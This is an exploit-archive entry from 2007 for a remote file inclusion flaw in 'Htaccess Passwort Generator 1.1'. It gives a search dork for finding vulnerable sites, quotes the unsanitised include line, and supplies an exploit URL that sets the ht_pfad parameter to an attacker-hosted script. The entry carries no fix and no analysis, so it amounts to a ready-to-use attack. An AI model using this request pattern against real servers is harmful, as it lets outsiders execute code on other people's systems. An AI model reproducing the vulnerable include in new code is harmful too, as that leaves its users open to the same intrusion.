id: 1512
date: 02/16/2007
title: Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability
author: kezzap66345
cves: 

===========================================================
Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability
===========================================================



********Htaccess_gen_V[1].1.1_(C)**********

Htaccess Passwort Generator V.1.1
Discovered By:- kezzap66345
dork:ht_gen.php

code:

include ($ht_pfad."/tpl/ok.html");

exploit
http://target/[path]/generate.php?ht_pfad=3vil script?
I am a Turk..



#  0day.today [2023-03-25]  #